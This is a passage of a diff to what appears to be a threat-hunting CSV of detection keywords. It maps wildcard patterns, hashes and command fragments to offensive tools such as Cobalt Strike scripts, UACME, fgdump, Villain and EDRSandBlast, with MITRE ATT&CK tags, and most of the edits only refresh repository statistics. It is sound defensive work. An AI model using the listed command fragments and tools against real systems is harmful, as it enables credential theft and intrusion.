TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" -"*fake-sms-main*","offensive_tool_keyword","fake-sms","A simple command line tool using which you can skip phone number based SMS verification by using a temporary phone number that acts like a proxy.","T1598.003 - T1514","TA0003 - TA0009","N/A","N/A","Defense Evasion","https://github.com/Narasimha1997/fake-sms","1","1","N/A","8","10","2513","167","2023-08-01T15:34:41Z","2021-02-18T15:18:50Z" +"*fake-sms-main*","offensive_tool_keyword","fake-sms","A simple command line tool using which you can skip phone number based SMS verification by using a temporary phone number that acts like a proxy.","T1598.003 - T1514","TA0003 - TA0009","N/A","N/A","Defense Evasion","https://github.com/Narasimha1997/fake-sms","1","1","N/A","8","10","2514","167","2023-08-01T15:34:41Z","2021-02-18T15:18:50Z" "*faketime '202* zsh*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*farmer.exe *\windows\temp*","offensive_tool_keyword","Farmer","Farmer is a project for collecting NetNTLM hashes in a Windows domain. Farmer achieves this by creating a local WebDAV server that causes the WebDAV Mini Redirector to authenticate from any connecting clients.","T1557.001 - T1056.004 - T1078.003","TA0006 - TA0004 - TA0001","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/mdsecactivebreach/Farmer","1","0","N/A","10","4","308","49","2021-04-28T15:27:24Z","2021-02-22T14:32:29Z" "*farmer.exe 8888 60*","offensive_tool_keyword","Farmer","Farmer is a project for collecting NetNTLM hashes in a Windows domain. Farmer achieves this by creating a local WebDAV server that causes the WebDAV Mini Redirector to authenticate from any connecting clients.","T1557.001 - T1056.004 - T1078.003","TA0006 - TA0004 - TA0001","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/mdsecactivebreach/Farmer","1","0","N/A","10","4","308","49","2021-04-28T15:27:24Z","2021-02-22T14:32:29Z" @@ -10219,12 +10370,12 @@ "*FastjsonScan.jar*","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","N/A","10","2757","606","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" "*fasttrack/wordlist.txt*","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*favfreak-http*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" -"*fb5dc2d637faab73729d65323fcc7d4b7edf43bf9f3de8d8e65ea55670229815*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" -"*fb8b5d212f449a8ba61ab9ed9b44853315c33d12a07f8ce4642892750e251530*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","0","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" +"*fb5dc2d637faab73729d65323fcc7d4b7edf43bf9f3de8d8e65ea55670229815*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*fb8b5d212f449a8ba61ab9ed9b44853315c33d12a07f8ce4642892750e251530*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","0","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" "*fcrackzip *","offensive_tool_keyword","fcrackzip","a Free/Fast Zip Password Cracker","T1473 - T1021.002","TA0005 - TA0008","N/A","N/A","Credential Access","https://manpages.ubuntu.com/manpages/trusty/man1/fcrackzip.1.html","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*fcrackzip *","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*fcrackzip *","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*fcrackzip -u -v -D -p *.zip*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*fde1b109f9704ff7.css*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*fde1b109f9704ff7.css*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" "*FE4414D9-1D7E-4EEB-B781-D278FE7A5619*","offensive_tool_keyword","RuralBishop","creates a local RW section in UrbanBishop and then maps that section as RX into a remote process","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.002 - T1070.004","TA0005 - TA0003 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/RuralBishop","1","0","N/A","10","2","101","28","2020-07-19T18:47:44Z","2020-07-19T18:47:38Z" "*FE8F0D23-BDD1-416D-8285-F947BA86D155*","offensive_tool_keyword","dazzleUP","A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.","T1068 - T1088 - T1210 - T1210.002","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/hlldz/dazzleUP","1","0","N/A","9","5","479","70","2020-07-23T08:48:43Z","2020-07-21T21:06:46Z" "*fea01b74-7a60-4142-a54d-7aa8f6471c00*","offensive_tool_keyword","o365enum","Enumerate valid usernames from Office 365 using ActiveSync - Autodiscover v1 or office.com login page.","T1595 - T1595.002 - T1114 - T1114.001 - T1087 - T1087.002","TA0040 - TA0010 - TA0007","N/A","N/A","Exploitation tools","https://github.com/gremwell/o365enum","1","0","N/A","7","3","212","40","2021-04-23T14:40:52Z","2020-02-18T12:22:50Z" @@ -10235,137 +10386,137 @@ "*fee -c */* -w 64 | *","offensive_tool_keyword","fileless-elf-exec","Execute ELF files without dropping them on disk","T1059.003 - T1055.012 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/nnsee/fileless-elf-exec","1","1","N/A","8","4","334","40","2021-11-16T15:46:23Z","2020-01-06T12:19:34Z" "*feroxbuster -w *fzf-wordlists* -u *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*Fertiliser.exe \\*","offensive_tool_keyword","Farmer","Farmer is a project for collecting NetNTLM hashes in a Windows domain. Farmer achieves this by creating a local WebDAV server that causes the WebDAV Mini Redirector to authenticate from any connecting clients.","T1557.001 - T1056.004 - T1078.003","TA0006 - TA0004 - TA0001","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/mdsecactivebreach/Farmer","1","0","N/A","10","4","308","49","2021-04-28T15:27:24Z","2021-02-22T14:32:29Z" -"*ff_osx_extension-dropper*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" -"*ff3f6b103b45ea48c5fa447854a35950378ce7558868d4975fd5b11202d0a991*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5486","1277","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*ff_osx_extension-dropper*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*ff3f6b103b45ea48c5fa447854a35950378ce7558868d4975fd5b11202d0a991*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" "*FFA0FDDE-BE70-49E4-97DE-753304EF1113*","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","0","N/A","10","10","1117","224","2023-09-22T14:18:21Z","2021-11-02T15:02:42Z" -"*FFA0FDDE-BE70-49E4-97DE-753304EF1113*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","2","180","34","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" -"*ffuf *-input-cmd*","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","0","N/A","N/A","10","10177","1154","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z" -"*ffuf *-u http*","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","0","N/A","N/A","10","10177","1154","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z" -"*ffuf -c *","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","0","N/A","N/A","10","10177","1154","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z" +"*FFA0FDDE-BE70-49E4-97DE-753304EF1113*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","2","183","35","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" +"*ffuf *-input-cmd*","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","0","N/A","N/A","10","10180","1155","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z" +"*ffuf *-u http*","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","0","N/A","N/A","10","10180","1155","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z" +"*ffuf -c *","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","0","N/A","N/A","10","10180","1155","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z" "*ffuf -fs 185 -c -w *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*ffuf -w *","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","0","N/A","N/A","10","10177","1154","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z" -"*ffuf.exe*","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","N/A","N/A","10","10177","1154","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z" -"*ffuf/ffuf*","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","N/A","N/A","10","10177","1154","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z" -"*ffuf_*_freebsd_*.tar.gz*","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","N/A","N/A","10","10177","1154","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z" -"*ffuf_*_linux_*.tar.gz*","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","N/A","N/A","10","10177","1154","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z" -"*ffuf_*_macOS_*.tar.gz*","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","N/A","N/A","10","10177","1154","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z" -"*ffuf_*_openbsd_*.tar.gz*","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","N/A","N/A","10","10177","1154","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z" -"*ffuf_*_windows_*.zip*","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","N/A","N/A","10","10177","1154","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z" -"*ffuf-master.zip*","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","N/A","N/A","10","10177","1154","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z" +"*ffuf -w *","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","0","N/A","N/A","10","10180","1155","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z" +"*ffuf.exe*","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","N/A","N/A","10","10180","1155","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z" +"*ffuf/ffuf*","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","N/A","N/A","10","10180","1155","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z" +"*ffuf_*_freebsd_*.tar.gz*","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","N/A","N/A","10","10180","1155","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z" +"*ffuf_*_linux_*.tar.gz*","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","N/A","N/A","10","10180","1155","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z" +"*ffuf_*_macOS_*.tar.gz*","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","N/A","N/A","10","10180","1155","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z" +"*ffuf_*_openbsd_*.tar.gz*","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","N/A","N/A","10","10180","1155","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z" +"*ffuf_*_windows_*.zip*","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","N/A","N/A","10","10180","1155","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z" +"*ffuf-master.zip*","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","N/A","N/A","10","10180","1155","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z" "*fgdump.exe*","offensive_tool_keyword","fgdump","A utility for dumping passwords on Windows NT/2000/XP/2003 machines","T1003.001 - T1003.002 - T1077 - T1059 - T1035 - T1021.002 - T1562.001","TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0008","N/A","Volt Typhoon","Credential Access","https://gitlab.com/kalilinux/packages/windows-binaries/-/tree/kali/master/fgdump","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*fgexec.exe*","offensive_tool_keyword","fgdump","A utility for dumping passwords on Windows NT/2000/XP/2003 machines","T1003.001 - T1003.002 - T1077 - T1059 - T1035 - T1021.002 - T1562.001","TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0008","N/A","Volt Typhoon","Credential Access","https://gitlab.com/kalilinux/packages/windows-binaries/-/tree/kali/master/fgdump","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*fierce --domain* --dns-servers *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*FiercePhish*","offensive_tool_keyword","FiercePhish","FiercePhish is a full-fledged phishing framework to manage all phishing engagements. It allows you to track separate phishing campaigns. schedule sending of emails. and much more. The features will continue to be expanded and will include website spoofing. click tracking. and extensive notification options. ","T1566 - T1566.001 - T1566.002 - T1566.003","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Phishing","https://github.com/Raikia/FiercePhish","1","1","N/A","N/A","10","1214","273","2023-05-18T15:38:38Z","2016-12-31T19:41:24Z" "*Fiesta Exploit Kit*","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","0","N/A","10","10","1362","429","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" -"*File_Smuggler_Http_Handler*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3252","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" -"*FileControler/FileControler_x64.dll*","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","402","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" -"*FileControler/FileControler_x86.dll*","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","402","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" +"*File_Smuggler_Http_Handler*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"*FileControler/FileControler_x64.dll*","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","403","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" +"*FileControler/FileControler_x86.dll*","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - 